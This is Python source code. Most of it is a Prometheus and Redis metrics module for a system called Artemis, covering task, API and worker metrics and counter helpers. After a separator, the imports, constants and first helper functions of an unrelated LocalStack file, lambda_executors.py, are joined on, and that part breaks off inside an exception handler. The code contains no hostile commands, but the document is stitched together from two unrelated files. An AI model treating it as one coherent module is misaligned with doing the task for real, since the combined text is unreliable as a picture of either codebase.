@staticmethod
@with_context
def inc_overall_errored_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all errored messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_ERRORED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_overall_retried_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all retried messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_RETRIED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_overall_rejected_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all rejected messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_REJECTED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_current_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of messages currently being processed.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def dec_current_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of all messages currently being processed.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_current_delayed_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of delayed messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_DELAYED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def dec_current_delayed_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of delayed messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_DELAYED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_message_durations(
queue: str,
actor: str,
duration: int,
poolname: Optional[str],
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of messages in a duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param duration: how long, in milliseconds, took actor to finish the task.
:param poolname: if specified, task was working with a particular pool.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in MESSAGE_DURATION_BUCKETS if threshold > duration])
inc_metric_field(
logger,
cache,
TaskMetrics._KEY_MESSAGE_DURATIONS,
'{}:{}:{}:{}'.format(queue, actor, bucket, poolname or 'undefined')
)
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(TaskMetrics, self).sync()
# queue:actor => count
self.overall_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_MESSAGES).items()
}
self.overall_errored_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_ERRORED_MESSAGES).items()
}
self.overall_retried_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_RETRIED_MESSAGES).items()
}
self.overall_rejected_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_REJECTED_MESSAGES).items()
}
self.current_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_CURRENT_MESSAGES).items()
}
self.current_delayed_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_CURRENT_DELAYED_MESSAGES).items()
}
# queue:actor:bucket:poolname => count
# deal with older version which had only three dimensions (no poolname)
self.message_durations = {}
for field, count in get_metric_fields(logger, cache, self._KEY_MESSAGE_DURATIONS).items():
field_split = tuple(field.split(':', 3))
if len(field_split) == 3:
field_split = field_split + ('undefined',)
self.message_durations[cast(Tuple[str, str, str, str], field_split)] = count
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(TaskMetrics, self).register_with_prometheus(registry)
self.OVERALL_MESSAGE_COUNT = Counter(
'overall_message_count',
'Overall total number of messages processed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_ERRORED_MESSAGE_COUNT = Counter(
'overall_errored_message_count',
'Overall total number of errored messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_RETRIED_MESSAGE_COUNT = Counter(
'overall_retried_message_count',
'Overall total number of retried messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_REJECTED_MESSAGE_COUNT = Counter(
'overall_rejected_message_count',
'Overall total number of rejected messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.CURRENT_MESSAGE_COUNT = Gauge(
'current_message_count',
'Current number of messages being processed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.CURRENT_DELAYED_MESSAGE_COUNT = Gauge(
'current_delayed_message_count',
'Current number of messages being delayed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.MESSAGE_DURATIONS = Histogram(
'message_duration_milliseconds',
'The time spent processing messages by queue and actor.',
['queue_name', 'actor_name', 'pool'],
buckets=MESSAGE_DURATION_BUCKETS,
registry=registry,
)
@with_context
def update_prometheus(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(TaskMetrics, self).update_prometheus()
def _update_counter(prom_metric: Counter, source: Dict[Tuple[str, str], int]) -> None:
reset_counters(prom_metric)
for (queue_name, actor_name), count in source.items():
prom_metric.labels(queue_name=queue_name, actor_name=actor_name)._value.set(count)
_update_counter(self.OVERALL_MESSAGE_COUNT, self.overall_message_count)
_update_counter(self.OVERALL_ERRORED_MESSAGE_COUNT, self.overall_errored_message_count)
_update_counter(self.OVERALL_REJECTED_MESSAGE_COUNT, self.overall_rejected_message_count)
_update_counter(self.OVERALL_RETRIED_MESSAGE_COUNT, self.overall_retried_message_count)
_update_counter(self.CURRENT_MESSAGE_COUNT, self.current_message_count)
_update_counter(self.CURRENT_DELAYED_MESSAGE_COUNT, self.current_delayed_message_count)
# Reset all duration buckets and sums first
reset_histogram(self.MESSAGE_DURATIONS)
# Then, update each bucket with number of observations, and each sum with (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
for (queue_name, actor_name, bucket_threshold, poolname), count in self.message_durations.items():
bucket_index = MESSAGE_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.MESSAGE_DURATIONS.labels(queue_name, actor_name, poolname)._buckets[bucket_index].set(count)
self.MESSAGE_DURATIONS.labels(queue_name, actor_name, poolname)._sum.inc(float(bucket_threshold) * count)
@dataclasses.dataclass
class APIMetrics(MetricsBase):
"""
API metrics (mostly HTTP traffic).
"""
request_durations: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
request_count: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
request_inprogress_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
_KEY_REQUEST_DURATIONS = 'metrics.api.http.request.durations'
_KEY_REQUEST_COUNT = 'metrics.api.http.request.total'
_KEY_REQUEST_INPROGRESS_COUNT = 'metrics.api.http.request.in-progress'
@staticmethod
@with_context
def inc_request_durations(
method: str,
path: str,
duration: float,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of HTTP requests in a duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param method: HTTP method.
:param path: API endpoint requested.
:param duration: how long, in milliseconds, took actor to finish the task.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in HTTP_REQUEST_DURATION_BUCKETS if threshold > duration])
inc_metric_field(
logger,
cache,
APIMetrics._KEY_REQUEST_DURATIONS,
'{}:{}:{}'.format(method, bucket, path)
)
return Ok(None)
@staticmethod
@with_context
def inc_requests(
method: str,
path: str,
status: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of completed requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param status: final HTTP status.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, APIMetrics._KEY_REQUEST_COUNT, '{}:{}:{}'.format(method, status, path))
return Ok(None)
@staticmethod
@with_context
def inc_requests_in_progress(
method: str,
path: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of current requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, APIMetrics._KEY_REQUEST_INPROGRESS_COUNT, '{}:{}'.format(method, path))
return Ok(None)
@staticmethod
@with_context
def dec_requests_in_progress(
method: str,
path: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of current requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, APIMetrics._KEY_REQUEST_INPROGRESS_COUNT, '{}:{}'.format(method, path))
return Ok(None)
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(APIMetrics, self).register_with_prometheus(registry)
self.REQUEST_DURATIONS = Histogram(
'http_request_duration_milliseconds',
'Time spent processing a request.',
['method', 'path'],
buckets=HTTP_REQUEST_DURATION_BUCKETS,
registry=registry
)
self.REQUEST_COUNT = Counter(
'http_requests_count',
'Request count by method, path and status line.',
['method', 'path', 'status'],
registry=registry
)
self.REQUESTS_INPROGRESS_COUNT = Gauge(
'http_requests_inprogress_count',
'Requests in progress by method and path',
['method', 'path'],
registry=registry
)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(APIMetrics, self).sync()
# NOTE: some paths may contain `:` => `path` must be the last bit, and `split()` must be called
# with limited number of splits to prevent `path` exploding.
# method:bucket:path => count
self.request_durations = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_DURATIONS).items()
}
# method:status:path => count
self.request_count = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_COUNT).items()
}
# method:path => count
self.request_inprogress_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_INPROGRESS_COUNT).items()
}
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(APIMetrics, self).update_prometheus()
# Reset all duration buckets and sums first
reset_histogram(self.REQUEST_DURATIONS)
# Then, update each bucket with number of observations, and each sum with (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
for (method, bucket_threshold, path), count in self.request_durations.items():
bucket_index = HTTP_REQUEST_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.REQUEST_DURATIONS \
.labels(method=method, path=path) \
._buckets[bucket_index].set(count)
self.REQUEST_DURATIONS \
.labels(method=method, path=path) \
._sum.inc(float(bucket_threshold) * count)
reset_counters(self.REQUEST_COUNT)
for (method, status, path), count in self.request_count.items():
self.REQUEST_COUNT \
.labels(method=method, path=path, status=status) \
._value.set(count)
reset_counters(self.REQUESTS_INPROGRESS_COUNT)
for (method, path), count in self.request_inprogress_count.items():
self.REQUESTS_INPROGRESS_COUNT \
.labels(method=method, path=path) \
._value.set(count)
@dataclasses.dataclass
class WorkerMetrics(MetricsBase):
"""
Proxy for metrics related to workers.
"""
worker_process_count: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
worker_thread_count: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
worker_updated_timestamp: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
_KEY_WORKER_PROCESS_COUNT = 'metrics.workers.{worker}.processes'
_KEY_WORKER_THREAD_COUNT = 'metrics.workers.{worker}.threads'
_KEY_UPDATED_TIMESTAMP = 'metrics.workers.{worker}.updated_timestamp'
@staticmethod
@with_context
def update_worker_counts(
*,
worker: str,
processes: int,
threads: int,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Update metrics for a given worker.
:param worker: name of the worker.
:param processes: number of worker processes.
:param threads: number of worker threads.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
set_metric(
logger,
cache,
WorkerMetrics._KEY_WORKER_PROCESS_COUNT.format(worker=worker),
processes,
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
set_metric(
logger,
cache,
WorkerMetrics._KEY_WORKER_THREAD_COUNT.format(worker=worker),
threads,
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
set_metric(
logger,
cache,
WorkerMetrics._KEY_UPDATED_TIMESTAMP.format(worker=worker),
int(datetime.datetime.timestamp(datetime.datetime.utcnow())),
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
return Ok(None)
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(WorkerMetrics, self).register_with_prometheus(registry)
self.WORKER_PROCESS_COUNT = Gauge(
'worker_process_count',
'Number of processes by worker.',
['worker'],
registry=registry
)
self.WORKER_THREAD_COUNT = Gauge(
'worker_thread_count',
'Number of threads by worker.',
['worker'],
registry=registry
)
self.WORKER_UPDATED_TIMESTAMP = Gauge(
'worker_updated_timestamp',
'Last time worker info info has been updated.',
['worker'],
registry=registry
)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(WorkerMetrics, self).sync()
self.worker_process_count = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.processes')
}
self.worker_thread_count = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.threads')
}
self.worker_updated_timestamp = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.updated_timestamp')
}
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(WorkerMetrics, self).update_prometheus()
reset_counters(self.WORKER_PROCESS_COUNT)
reset_counters(self.WORKER_THREAD_COUNT)
reset_counters(self.WORKER_UPDATED_TIMESTAMP)
# TODO: move these into `reset_counters` - these should be more reliable, and we wouldn't have to
# do the work on our own.
self.WORKER_PROCESS_COUNT.clear()
self.WORKER_THREAD_COUNT.clear()
self.WORKER_UPDATED_TIMESTAMP.clear()
for worker, processes in self.worker_process_count.items():
self.WORKER_PROCESS_COUNT \
.labels(worker=worker) \
.set(processes)
for worker, threads in self.worker_thread_count.items():
self.WORKER_THREAD_COUNT \
.labels(worker=worker) \
.set(threads)
for worker, timestamp in self.worker_updated_timestamp.items():
self.WORKER_UPDATED_TIMESTAMP \
.labels(worker=worker) \
.set(timestamp if timestamp is None else float(timestamp))
@staticmethod
def spawn_metrics_refresher(
logger: gluetool.log.ContextAdapter,
worker_name: str,
interval: int,
metrics_getter: Callable[[Any], Result[Tuple[int, int], Failure]],
thread_name: str = 'worker-metrics-refresher',
worker_instance: Optional[Any] = None,
) -> threading.Thread:
"""
Create and start a thread to refresh cached worker metrics.
A thread is started, to call ``metrics_getter`` periodically. After each call, data provided by the callable
are stored in a cache.
The thread is marked as ``daemon``, therefore it is not necessary to stop it when caller decides to quit.
:param logger: logger to use for logging.
:param worker_name: name of the worker.
:param worker_instance: instance of the worker. It is not inspected by the thread, and it's passed directly
to ``metrics_getter``.
:param interval: how often to refresh worker metrics.
:param metrics_getter: a callable with one parameter, ``worker_instance``. It is called every iteration
and should return a pair fo two values, number of worker processes and threads.
:param thread_name: name of the refresher thread.
:returns: running and daemonized thread.
"""
def _refresh_loop() -> None:
while True:
r_metrics = metrics_getter(worker_instance)
if r_metrics.is_error:
r_metrics.unwrap_error().handle(logger)
else:
processes, threads = r_metrics.unwrap()
WorkerMetrics.update_worker_counts(
worker=worker_name,
processes=processes,
threads=threads
)
time.sleep(interval)
thread = threading.Thread(target=_refresh_loop, name=thread_name, daemon=True)
thread.start()
return thread
@dataclasses.dataclass
class Metrics(MetricsBase):
"""
Global metrics that don't fit anywhere else, and also a root of the tree of metrics.
"""
db: DBMetrics = DBMetrics()
pools: PoolsMetrics = PoolsMetrics()
provisioning: ProvisioningMetrics = ProvisioningMetrics()
routing: RoutingMetrics = RoutingMetrics()
tasks: TaskMetrics = TaskMetrics()
api: APIMetrics = APIMetrics()
workers: WorkerMetrics = WorkerMetrics()
# Registry this tree of metrics containers is tied to.
_registry: Optional[CollectorRegistry] = None
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(Metrics, self).register_with_prometheus(registry)
self._registry = registry
self.PACKAGE_INFO = Info(
'artemis_package',
'Artemis packaging info. Labels provide information about package versions.',
registry=registry
)
self.IDENTITY_INFO = Info(
'artemis_identity',
'Artemis identity info. Labels provide information about identity aspects.',
registry=registry
)
# Since these values won't ever change, we can already set metrics and be done with it.
self.PACKAGE_INFO.info({
'package_version': __VERSION__,
'image_digest': os.getenv('ARTEMIS_IMAGE_DIGEST', '<undefined>'),
'image_url': os.getenv('ARTEMIS_IMAGE_URL', '<undefined>')
})
self.IDENTITY_INFO.info({
'api_node': platform.node(),
'artemis_deployment': os.getenv('ARTEMIS_DEPLOYMENT', '<undefined>')
})
@with_context
def render_prometheus_metrics(self, db: artemis_db.DB) -> Result[bytes, Failure]:
"""
Render plaintext output of Prometheus metrics representing values in this tree of metrics.
.. note::
**Requires** the context variables defined in :py:mod:`tft.artemis` to be set properly.
:param db: DB instance to use for DB access.
:returns: plaintext represenation of Prometheus metrics, encoded as ``bytes``.
"""
def _render() -> bytes:
with db.get_session() as session:
SESSION.set(session)
self.sync()
self.update_prometheus()
return cast(bytes, generate_latest(registry=self._registry))
return safe_call(_render)
def upsert_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any],
change: int
) -> None:
"""
Update a stored value of a given metric.
Wrapper for :py:func:`tft.artemis.db.upsert` to simplify its use when it comes to metrics. With metrics, we work
with the following assumptions:
* model (table) has one or more primary keys,
* model has a "counter" column (called ``count``) which holds the value of the metric specified by primary keys.
Therefore, this helper focuses on changing the counter, using primary keys to limit the change, or initialize
the row if it doesn't exist yet.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. This mapping is used to limit
the update to a particular record, or initialize new record if it doesn't exist yet.
Primary keys - keys of the mapping - should be the columns of the given model.
:param change: amount to add to ``count``.
"""
# TODO: actually check if result of upsert was sucessful
artemis_db.upsert(
logger,
session,
model,
primary_keys,
insert_data={getattr(model, 'count'): 1},
update_data={'count': getattr(model, 'count') + change}
)
def upsert_inc_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any]
) -> None:
"""
Increment a metric counter by 1.
Implemented as a thin wrapper for :py:func:`upsert_metric`, therefore the parameters share their meaning.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. See :py:func:`upsert_metric`
for more details.
"""
upsert_metric(logger, session, model, primary_keys, 1)
def upsert_dec_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any]
) -> None:
"""
Decrement a metric counter by 1.
Implemented as a thin wrapper for :py:func:`upsert_metric`, therefore the parameters share their meaning.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. See :py:func:`upsert_metric`
for more details.
"""
upsert_metric(logger, session, model, primary_keys, -1)
def inc_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
amount: int = 1
) -> None:
"""
Increment a metric counter by 1. If metric does not exist yet, it is set to `0` and incremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric to increment.
:param amount: amount to increment by.
"""
inc_cache_value(logger, cache, metric, amount=amount)
def dec_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
amount: int = 1
) -> None:
"""
Decrement a metric counter by 1. If metric does not exist yet, it is set to `0` and decremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric to decrement.
:param amount: amount to decrement by.
"""
dec_cache_value(logger, cache, metric, amount=amount)
def inc_metric_field(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
field: str,
amount: int = 1
) -> None:
"""
Increment a metric field counter by 1. If metric field does not exist yet, it is set to `0` and incremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: parent metric to access.
:param field: field to increment.
:param amount: amount to increment by.
"""
inc_cache_field(logger, cache, metric, field, amount=amount)
def dec_metric_field(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
field: str,
amount: int = 1
) -> None:
"""
Decrement a metric field counter by 1. If metric field does not exist yet, it is set to `0` and decremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: parent metric to access.
:param field: field to decrement.
:param amount: amount to decrement by.
"""
dec_cache_field(logger, cache, metric, field, amount=amount)
def get_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str
) -> Optional[int]:
"""
Return a metric counter for the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to retrieve.
:returns: value of the metric.
"""
# Redis returns everything as bytes, therefore we need to decode field names to present them as strings
# and convert values to integers. To make things more complicated, lack of type annotations forces us
# to wrap `get` with `cast` calls.
value: Optional[bytes] = get_cache_value(logger, cache, metric)
return value if value is None else int(value)
def set_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
value: Optional[int] = None,
ttl: Optional[int] = None
) -> None:
"""
Set a metric counter for the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to retrieve.
:param value: value to set to.
:param ttl: if set, metric would expire in ``ttl`` seconds, and will be removed from cache.
"""
# Redis returns everything as bytes, therefore we need to decode field names to present them as strings
# and convert values to integers. To make things more complicated, lack of type annotations forces us
# to wrap `get` with `cast` calls.
set_cache_value(logger, cache, metric, value=str(value).encode() if value is not None else None, ttl=ttl)
def get_metric_fields(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str
) -> Dict[str, int]:
"""
Return a mapping between fields and corresponding counters representing the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to retrieve.
:returns: mapping between field and counters.
"""
# Redis returns everything as bytes, therefore we need to decode field names to present them as strings
# and convert values to integers. To make things more complicated, lack of type annotations forces us
# to wrap `hgetall` with `cast` calls.
return {
field.decode(): int(value)
for field, value in iter_cache_fields(logger, cache, metric)
}
|
lambda_executors.py | import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port, rm_docker_container)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = '/var/task'
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details) or ''
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
